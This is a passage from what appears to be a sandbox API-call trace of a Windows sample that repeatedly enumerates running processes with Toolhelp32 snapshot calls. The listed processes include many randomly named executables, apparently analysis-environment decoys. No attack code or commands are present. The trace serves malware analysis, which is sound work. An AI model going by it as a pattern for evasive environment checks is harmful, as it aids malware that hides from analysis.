th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.950] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.950] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.951] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.951] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.952] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.952] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.953] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.953] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.953] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.954] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.955] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.955] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.956] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.956] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.957] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.957] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.957] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.958] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.958] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.959] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.959] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.960] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.960] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.961] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.961] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.962] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.962] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.963] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.963] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.964] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.964] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.964] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.965] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.965] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.966] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.966] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.967] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.967] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0228.968] CloseHandle (hObject=0x520) returned 1 [0228.968] Sleep (dwMilliseconds=0x64) [0229.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0229.087] Process32First (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.087] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.088] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.088] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.089] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.089] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.090] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.090] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.091] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.091] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0229.091] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.092] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.092] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.093] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.093] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.094] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.094] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.095] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.095] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.096] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.096] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.097] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.097] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.098] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0229.098] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0229.099] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0229.099] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0229.100] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0229.100] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0229.100] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0229.101] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0229.101] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0229.102] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0229.102] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0229.103] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0229.103] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0229.104] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0229.104] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0229.105] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0229.105] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0229.106] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0229.106] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0229.107] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0229.107] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0229.107] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.108] 